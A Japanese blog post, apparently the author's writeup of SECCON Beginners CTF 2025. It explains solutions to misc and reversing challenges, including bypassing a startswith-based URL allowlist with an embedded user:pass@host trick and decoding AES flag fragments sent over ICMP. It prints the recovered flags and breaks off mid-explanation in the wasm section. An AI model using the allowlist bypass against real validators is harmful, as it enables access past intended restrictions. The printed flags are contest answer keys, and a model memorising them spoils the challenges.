{"id":1203,"date":"2025-07-27T14:03:31","date_gmt":"2025-07-27T05:03:31","guid":{"rendered":"https:\/\/emeth.jp\/diary\/?p=1203"},"modified":"2025-07-27T14:03:32","modified_gmt":"2025-07-27T05:03:32","slug":"seccon-beginners-ctf-2025-writeup","status":"publish","type":"post","link":"https:\/\/emeth.jp\/diary\/2025\/07\/seccon-beginners-ctf-2025-writeup\/","title":{"rendered":"SECCON Beginners CTF 2025 writeup"},"content":{"rendered":"\n<p>\u89e3\u3044\u305f\u306e\u3060\u3051<\/p>\n\n\n\n<!--more-->\n\n\n\n<p>\u3074\u3063\u305f\u308a200\u4f4d\u3002pwn\u3067\u304d\u306a\u3044\u30de\u30f3\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20.png\"><img loading=\"lazy\" decoding=\"async\" width=\"549\" height=\"450\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20.png\" alt=\"\" class=\"wp-image-1227\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20.png 549w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-20-300x246.png 300w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/a><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">web<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">crypto<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; kingyo_sukui<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>scooping! 
<a href=\"http:\/\/kingyo-sukui.challenges.beginners.seccon.jp:33333\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/kingyo-sukui.challenges.beginners.seccon.jp:33333<\/a><\/p>\n<\/blockquote>\n\n\n\n<p>\u30b2\u30fc\u30e0\u306e\u65b9\u306b\u306f\u624b\u3092\u89e6\u308c\u305a\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068 <code>encryptedFlag<\/code> \u3068 <code>secretKey<\/code> \u304c\u3042\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9.png\"><img loading=\"lazy\" decoding=\"async\" width=\"431\" height=\"87\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9.png\" alt=\"\" class=\"wp-image-1214\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9.png 431w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-9-300x61.png 300w\" sizes=\"auto, (max-width: 431px) 100vw, 431px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p><code>decryptFlag<\/code> \u95a2\u6570\u3067\u5fa9\u53f7\u3057\u3066\u3044\u308b\u306e\u3067\u540c\u3058\u51e6\u7406\u3092\u3057\u3066\u3084\u308c\u3070\u30d5\u30e9\u30b0\u3092\u5f97\u3089\u308c\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10.png\"><img loading=\"lazy\" decoding=\"async\" width=\"531\" height=\"288\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10.png\" alt=\"\" class=\"wp-image-1215\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10.png 531w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-10-300x163.png 300w\" sizes=\"auto, (max-width: 531px) 100vw, 531px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>\u307f\u3093\u306a\u5927\u597d\u304dCyberChef\u3067\u89e3\u3044\u305f\u3002<code>secretKey<\/code> \u306e\u30c7\u30b3\u30fc\u30c9\u3068 <code>encryptedFlag<\/code> 
\u306e\u5fa9\u53f7\u306e2\u3064\u306b\u5206\u3051\u3066\u3084\u3063\u305f\u304c\u30011\u56de\u3067\u4e21\u65b9\u3068\u3082\u3084\u308b\u65b9\u6cd5\u306f\u3042\u308b\u306e\u3060\u308d\u3046\u304b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11.png\"><img loading=\"lazy\" decoding=\"async\" width=\"875\" height=\"408\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11.png\" alt=\"\" class=\"wp-image-1216\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11.png 875w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11-300x140.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11-768x358.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-11-624x291.png 624w\" sizes=\"auto, (max-width: 875px) 100vw, 875px\" \/><\/a><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"353\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-1024x353.png\" alt=\"\" class=\"wp-image-1217\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-1024x353.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-300x103.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-768x265.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12-624x215.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-12.png 1212w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{n47uma7ur1}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; url-checker<\/h2>\n\n\n\n<blockquote 
class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6709\u52b9\u306aURL\u3092\u4f5c\u308c\u307e\u3059\u304b\uff1f<\/p>\n\n\n\n<p><code>nc url-checker.challenges.beginners.seccon.jp 33457<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068\u3001\u30db\u30b9\u30c8\u540d\u304c\u8a31\u53ef\u3055\u308c\u305f\u3082\u306e\u3068\u4e00\u81f4\u3057\u306a\u3044\u5834\u5408\u306b <code>startswith<\/code> \u3067\u5224\u5b9a\u3057\u3001True\u306e\u5834\u5408\u306b\u30d5\u30e9\u30b0\u3092\u8fd4\u3057\u3066\u3044\u308b\u3002\u306a\u306e\u3067 <code>example.com.jp<\/code> \u306a\u3069\u3068\u3057\u3066\u3084\u308c\u3070\u901a\u308b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13.png\"><img loading=\"lazy\" decoding=\"async\" width=\"904\" height=\"281\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13.png\" alt=\"\" class=\"wp-image-1218\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13.png 904w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13-300x93.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13-768x239.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-13-624x194.png 624w\" sizes=\"auto, (max-width: 904px) 100vw, 904px\" \/><\/a><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{574r75w17h_50m371m35_n07_53cur37}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; url-checker2<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u6709\u52b9\u306aURL\u3092\u4f5c\u308c\u307e\u3059\u304b\uff1f Part2<\/p>\n\n\n\n<p><code>nc url-checker2.challenges.beginners.seccon.jp 33458<\/code><\/p>\n<\/blockquote>\n\n\n\n<p><code>hostname<\/code> \u3092 <code>startswith<\/code> 
\u3067\u5224\u5b9a\u3057\u3066\u3044\u308b\u306e\u306f\u5909\u308f\u3089\u306a\u3044\u304c\u3001<code>netloc<\/code> \u3092 <code>:<\/code> \u3067\u533a\u5207\u3063\u305f\u6700\u521d\u306e\u90e8\u5206\u304c\u8a31\u53ef\u3055\u308c\u305f\u30db\u30b9\u30c8\u540d\u306b\u306a\u3063\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u306e\u5224\u5b9a\u304c\u8ffd\u52a0\u3055\u308c\u3066\u3044\u308b\u3002<code>netloc<\/code> \u306f <code>:\/\/<\/code> \u304b\u3089 <code>\/<\/code> \u307e\u3067\u306e\u90e8\u5206\u306e\u3053\u3068\u3067\u3042\u308b\u3002<\/p>\n\n\n\n<p>\u4e00\u898b\u30dd\u30fc\u30c8\u756a\u53f7\u6307\u5b9a\u306b\u3082\u5bfe\u5fdc\u3057\u3066\u3044\u3066\u554f\u984c\u306a\u3044\u3088\u3046\u306b\u898b\u3048\u308b\u304c\u3001URL\u306b\u306f\u8a8d\u8a3c\u306e\u305f\u3081\u306b\u30e6\u30fc\u30b6\u540d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u57cb\u3081\u8fbc\u3080\u3053\u3068\u304c\u3067\u304d\u3001\u305d\u306e\u500b\u6240\u306f <code>netloc<\/code> \u5185\u3067 <code>user:pass@host:port<\/code> \u306e\u5f62\u306b\u306a\u308b\u3002\u3068\u3044\u3046\u3053\u3068\u306f\u3053\u306e\u5f62\u5f0f\u306e\u5834\u5408\u306f <code>:<\/code> \u3067\u533a\u5207\u3063\u305f\u6700\u521d\u306e\u90e8\u5206\u304c <code>user<\/code> \u306b\u306a\u308b\u305f\u3081\u3001\u3053\u3053\u306b\u8a31\u53ef\u3055\u308c\u305f\u30db\u30b9\u30c8\u540d\u3092\u57cb\u3081\u8fbc\u3093\u3067\u3084\u308c\u3070\u3088\u3044\u3002\u5bfe\u7b56\u3068\u3057\u3066\u306f\u3001<code>netloc<\/code> \u3092\u81ea\u524d\u3067\u5206\u5272\u305b\u305a\u3001\u30d1\u30fc\u30b9\u7d50\u679c\u306e <code>hostname<\/code> \u3092\u8a31\u53ef\u30ea\u30b9\u30c8\u3068\u5b8c\u5168\u4e00\u81f4\u3067\u6bd4\u8f03\u3059\u308b\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14.png\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"236\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14.png\" alt=\"\" class=\"wp-image-1219\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14.png 908w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14-300x78.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14-768x200.png 768w, 
https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-14-624x162.png 624w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/a><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{cu570m_pr0c3551n6_0f_url5_15_d4n63r0u5}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">misc &#8211; Chamber of Echos<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u3069\u3046\u3084\u3089\u79c1\u305f\u3061\u306e\u30b5\u30fc\u30d0\u304c\u6a5f\u5bc6\u60c5\u5831\u3092\u9001\u4fe1\u3057\u3066\u3057\u307e\u3063\u3066\u3044\u308b\u3088\u3046\u3067\u3059\u3002 \u3088\u30fc\u304f\u8033\u3092\u6f84\u307e\u305b\u3066\u6b63\u3057\u3044\u65b9\u6cd5\u3067\u8a71\u3057\u304b\u3051\u308c\u3070\u3001\u5947\u5999\u306a\u6697\u53f7\u901a\u4fe1\u3092\u884c\u3063\u3066\u3044\u308b\u306e\u306b\u6c17\u3065\u304f\u306f\u305a\u3067\u3059\u3002 \u5e78\u3044\u3001\u6211\u3005\u306f\u4f7f\u7528\u3057\u3066\u3044\u308b\u6697\u53f7\u5316\u65b9\u5f0f\u3068\u6697\u53f7\u9375\u3092\u5165\u624b\u3057\u3066\u3044\u307e\u3059\u3002 \u53ce\u96c6\u30fb\u5fa9\u53f7\u3057\u3001\u6b63\u3057\u3044\u9806\u756a\u306b\u4e26\u3079\u3066\u30d5\u30e9\u30b0\u3092\u53d6\u5f97\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>\u6697\u53f7\u5316\u65b9\u5f0f: <code>AES-128-ECB<\/code><\/p>\n\n\n\n<p>\u5fa9\u53f7\u9375 (HEX): 
<code>546869734973415365637265744b6579<\/code><\/p>\n\n\n\n<p><code>chamber-of-echos.challenges.beginners.seccon.jp<\/code><\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30b3\u30fc\u30c9\u3092\u898b\u308b\u3068\u3001\u30d5\u30e9\u30b0\u3092\u8907\u6570\u306b\u5206\u5272\u3057\u3066AES\u3067\u6697\u53f7\u5316\u3057\u3001ICMP\u306e\u30ec\u30b9\u30dd\u30f3\u30b9\u3067\u9001\u308a\u51fa\u3057\u3066\u3044\u308b\uff08\u5206\u5272\u3057\u305f\u3046\u3061\u306e\u3069\u308c\u3092\u9001\u308b\u304b\u306f\u30e9\u30f3\u30c0\u30e0\uff09\u3002\u4f55\u5206\u5272\u3055\u308c\u3066\u3044\u308b\u304b\u306f\u308f\u304b\u3089\u306a\u3044\u304c\u591a\u3081\u306b\u53d6\u308c\u3070\u5168\u30d1\u30bf\u30fc\u30f3\u3042\u308b\u3060\u308d\u3046\u3068\u3001Wireshark\u3067\u30ad\u30e3\u30d7\u30c1\u30e3\u3057\u3064\u3064ping\u3092\u9001\u4fe1\u3057\u3066\u307f\u308b\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"689\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-1024x689.png\" alt=\"\" class=\"wp-image-1220\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-1024x689.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-300x202.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-768x517.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15-624x420.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-15.png 1182w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>1\u3064\u306eEcho 
request\u306b\u5bfe\u3057\u3066reply\u304c2\u3064\u3042\u308b\u306e\u306f\u30db\u30b9\u30c8\u304c\u9001\u3063\u3066\u304f\u308b\u901a\u5e38\u306e\u30ea\u30d7\u30e9\u30a4\u3068\u3053\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u306b\u3088\u308b\u30ea\u30d7\u30e9\u30a4\u304c\u3042\u308b\u305f\u3081\u3002ICMP\u30c7\u30fc\u30bf\u304c <code>abcdefghijklmnopqrstuvwabcdefghi<\/code> \u306b\u306a\u3063\u3066<strong>\u3044\u306a\u3044<\/strong>\u3082\u306e\u304c\u3053\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u306b\u3088\u308b\u3082\u306e\u3002<\/p>\n\n\n\n<p>CyberChef\u3067\u5fa9\u53f7\uff06\u30d5\u30e9\u30b0\u5fa9\u5143\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u4f5c\u3063\u3066ICMP\u30c7\u30fc\u30bf\u3092\u767b\u9332\u3057\u3066\u3044\u304f\u3068\u30013\u3064\u3067\u30d5\u30e9\u30b0\u304c\u5b8c\u6210\u3057\u305f\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"816\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-1024x816.png\" alt=\"\" class=\"wp-image-1221\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-1024x816.png 1024w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-300x239.png 300w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-768x612.png 768w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16-624x497.png 624w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-16.png 1232w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>Flag: ctf4b{th1s_1s_c0v3rt_ch4nn3l_4tt4ck}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; CrazyLazyProgram1<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow 
wp-block-quote-is-layout-flow\">\n<p>\u6539\u884c\u304c\u9762\u5012\u3060\u3063\u305f\u306e\u3067\u30ef\u30f3\u30e9\u30a4\u30ca\u30fc\u306b\u3057\u3066\u307f\u307e\u3057\u305f\u3002<\/p>\n<\/blockquote>\n\n\n\n<p>\u4e0e\u3048\u3089\u308c\u305f\u30b3\u30fc\u30c9\u3092\uff08\u624b\u52d5\u3067\uff09\u6574\u5f62\u3059\u308b\u3068\u3053\u3093\u306a\u611f\u3058\u306b\u3002<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: csharp; title: ; notranslate\" title=\"\">\nusing System;\nclass Program {\n    static void Main() {\n        int len=0x23;\n        Console.Write(&quot;INPUT &gt; &quot;);\n        string flag=Console.ReadLine();\n        if ((flag.Length) != len) {\n            Console.WriteLine(&quot;WRONG!&quot;);\n        } else {\n            if ( flag&#x5B;0]  == 0x63 &amp;&amp; flag&#x5B;1]  == 0x74 &amp;&amp; flag&#x5B;2]  == 0x66 &amp;&amp; flag&#x5B;3]  == 0x34 &amp;&amp;\n                 flag&#x5B;4]  == 0x62 &amp;&amp; flag&#x5B;5]  == 0x7b &amp;&amp; flag&#x5B;6]  == 0x31 &amp;&amp; flag&#x5B;7]  == 0x5f &amp;&amp;\n                 flag&#x5B;8]  == 0x31 &amp;&amp; flag&#x5B;9]  == 0x69 &amp;&amp; flag&#x5B;10] == 0x6e &amp;&amp; flag&#x5B;11] == 0x33 &amp;&amp;\n                 flag&#x5B;12] == 0x72 &amp;&amp; flag&#x5B;13] == 0x35 &amp;&amp; flag&#x5B;14] == 0x5f &amp;&amp; flag&#x5B;15] == 0x6d &amp;&amp;\n                 flag&#x5B;16] == 0x61 &amp;&amp; flag&#x5B;17] == 0x6b &amp;&amp; flag&#x5B;18] == 0x33 &amp;&amp; flag&#x5B;19] == 0x5f &amp;&amp;\n                 flag&#x5B;20] == 0x50 &amp;&amp; flag&#x5B;21] == 0x47 &amp;&amp; flag&#x5B;22] == 0x5f &amp;&amp; flag&#x5B;23] == 0x68 &amp;&amp;\n                 flag&#x5B;24] == 0x61 &amp;&amp; flag&#x5B;25] == 0x72 &amp;&amp; flag&#x5B;26] == 0x64 &amp;&amp; flag&#x5B;27] == 0x5f &amp;&amp;\n                 flag&#x5B;28] == 0x32 &amp;&amp; flag&#x5B;29] == 0x5f &amp;&amp; flag&#x5B;30] == 0x72 &amp;&amp; flag&#x5B;31] == 0x33 &amp;&amp;\n                 
flag&#x5B;32] == 0x61 &amp;&amp; flag&#x5B;33] == 0x64 &amp;&amp; flag&#x5B;34] == 0x7d) {\n                Console.WriteLine(&quot;YES!!!\\nThis is Flag :)&quot;);\n            } else {\n                Console.WriteLine(&quot;WRONG!&quot;);\n            }\n        }\n    }\n}\n<\/pre><\/div>\n\n\n<p>\u6700\u5f8c\u306e<code> if <\/code>\u6587\u3067\u30d5\u30e9\u30b0\u30c1\u30a7\u30c3\u30af\u3057\u3066\u308b\u306e\u3067 <code>True<\/code> \u306b\u306a\u308b\u3088\u3046\u306b\u30d5\u30e9\u30b0\u3092\u7d44\u307f\u7acb\u3066\u3066\u3084\u308c\u3070OK<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{1_1in3r5_mak3_PG_hard_2_r3ad}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; CrazyLazyProgram2<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u304c\u9762\u5012\u3060\u3063\u305f\u306e\u3067\u6a5f\u68b0\u8a9e\u3067\u4f5c\u3063\u3066\u307f\u307e\u3057\u305f<\/p>\n<\/blockquote>\n\n\n\n<p>\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u30d5\u30a1\u30a4\u30eb\u304c\u4e0e\u3048\u3089\u308c\u308b\u306e\u3067IDA\u306b\u98df\u308f\u305b\u3066\u307f\u308b\u3068\u4f55\u304b\u5206\u5c90\u306e\u591a\u3044\u69cb\u9020\u304c\u898b\u3048\u308b\u304c\u3001\u30d5\u30e9\u30b0\u6587\u5b57\u304b\u3069\u3046\u304b1\u6587\u5b57\u305a\u3064\u5224\u5b9a\u3057\u3066\u3044\u308b\u3060\u3051\u306a\u306e\u3067\u305d\u308c\u305e\u308c\u306e\u6587\u5b57\u3092\u629c\u304d\u51fa\u3057\u3066\u304f\u308c\u3070\u3088\u3044\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2.png\"><img loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"821\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2.png\" alt=\"\" class=\"wp-image-1204\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2.png 749w, 
https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2-274x300.png 274w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-2-624x684.png 624w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/a><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{GOTO_G0T0_90t0_N0m0r3_90t0}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">reversing &#8211; D-Compile<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>C\u8a00\u8a9e\u306e\u6b21\u306f\u3053\u308c!<\/p>\n\n\n\n<p>This is the next trending programming language!<\/p>\n\n\n\n<p>\u203b\u4e00\u90e8\u74b0\u5883\u3067\u306f<code>libgphobos5<\/code>\u304c\u5fc5\u8981\u3068\u306a\u308a\u307e\u3059\u3002 \u307e\u305f\u5fc5\u8981\u306b\u5fdc\u3058\u3066<code>echo -n<\/code>\u3092\u3054\u5229\u7528\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<p>Note:In some environments, <code>libgphobos5<\/code> is required. Also, use the <code>echo -n<\/code> command as necessary.<\/p>\n<\/blockquote>\n\n\n\n<p>IDA\u3067\u958b\u3044\u3066 <code>_Dmain<\/code> \u3092\u898b\u305f\u3089\u30d5\u30e9\u30b0\u3063\u307d\u3044\u3082\u306e\u304c\u3002<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3.png\"><img loading=\"lazy\" decoding=\"async\" width=\"414\" height=\"1024\" src=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3-414x1024.png\" alt=\"\" class=\"wp-image-1205\" srcset=\"https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3-414x1024.png 414w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3-121x300.png 121w, https:\/\/emeth.jp\/diary\/wp-content\/uploads\/2025\/07\/image-3.png 589w\" sizes=\"auto, (max-width: 414px) 100vw, 414px\" \/><\/a><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-code\"><code>FLAG: ctf4b{N3xt_Tr3nd_D_1an9uag3_101}<\/code><\/pre>\n\n\n\n<h2 
class=\"wp-block-heading\">reversing &#8211; wasm_S_exp<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u30d5\u30e9\u30b0\u3092\u30c1\u30a7\u30c3\u30af\u3057\u3066\u304f\u308c\u308b\u30d7\u30ed\u30b0\u30e9\u30e0<\/p>\n<\/blockquote>\n\n\n\n<p>WebAssembly\u306e\u30c6\u30ad\u30b9\u30c8\u304c\u4e0e\u3048\u3089\u308c\u308b\u3002\u30c6\u30ad\u30b9\u30c8\u5f62\u5f0f\u306eWebAssembly\u306b\u3064\u3044\u3066\u306f\u4ee5\u4e0b\u3092\u53c2\u7167\u3002<\/p>\n\n\n<div class=\"wp-block-su-blogcard\">\n\t<article class=\"wp-blogcard\" cite=\"https:\/\/developer.mozilla.org\/ja\/docs\/WebAssembly\/Guides\/Understanding_the_text_format\">\n\t\t<a\n\t\t\thref=\"https:\/\/developer.mozilla.org\/ja\/docs\/WebAssembly\/Guides\/Understanding_the_text_format\"\n\t\t\taria-label=\"\"\n\t\t\t\t\t\t\ttarget=\"_blank\"\n\t\t\t\t\t\t\t\t\t\trel=\"noopener noreferrer nofollow\"\n\t\t\t\t\t\tclass=\"wp-blogcard-item\"\n\t\t>\n\t\t\t\t\t\t<div class=\"wp-blogcard-content\">\n\t\t\t\t<div class=\"wp-blogcard-title\"><\/div>\n\t\t\t\t<div class=\"wp-blogcard-description\"><\/div>\n\t\t\t\t<div class=\"wp-blogcard-cite\">\n\t\t\t\t\t\t\t\t\t\t\t<img\n\t\t\t\t\t\t\tclass=\"wp-blogcard-favicon\"\n\t\t\t\t\t\t\tsrc=\"https:\/\/www.google.com\/s2\/favicons?domain=developer.mozilla.org&#038;sz=16\"\n\t\t\t\t\t\t\talt=\"\"\n\t\t\t\t\t\t\taria-hidden=\"true\"\n\t\t\t\t\t\t\/>\n\t\t\t\t\t\t\t\t\t\t<div class=\"wp-blogcard-domain\">developer.mozilla.org<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/a>\n\t<\/article>\n<\/div>\n\n\n\n<p><code>stir<\/code> \u95a2\u6570\u3067\u306f\u4ee5\u4e0b\u306e\u51e6\u7406\u3092\u3057\u3066\u3044\u308b<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u4e0e\u3048\u3089\u308c\u305f\u5024\u3068 <code>0x5a5a<\/code> 
\u3092XOR\u3059\u308b<\/li>\n\n\n\n<li>37\u3092\u304b\u3051\u308b<\/li>\n\n\n\n<li>23\u3092\u8db3\u3059<\/li>\n\n\n\n<li>101\u3067\u5272\u3063\u305f\u4f59\u308a\u3092\u6c42\u3081\u308b<\/li>\n\n\n\n<li>1024\u3092\u8db3\u3059<\/li>\n<\/ol>\n\n\n\n<p><code>check_flag<\/code> \u95a2\u6570\u3067\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u51e6\u7406\u3092\u7e70\u308a\u8fd4\u3057\u3066\u3044\u308b\u3002\u6700\u521d\u306e\u30d6\u30ed\u30c3\u30af\u306e\u30c7\u30fc\u30bf\u3092\u4f7f\u3063\u3066\u8aac\u660e\u3002<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>38\u3092\u30d1\u30e9\u30e1\u30fc\u30bf\u306b <code>stir<\/code> \u95a2\u6570\u3092\u547c\u3073\u51fa\u3059<\/li>\n\n\n\n<li>\u8fd4\u308a\u5024\u3092\u756a\u5730\u3068\u3057\u3066\u30e1\u30e2\u30ea\u30a2\u30af\u30bb\u30b9\u3057\u30661\u30d0\u30a4\u30c8\u53d6\u5f97<\/li>\n\n\n\n<li><code>0x7b<\/code> 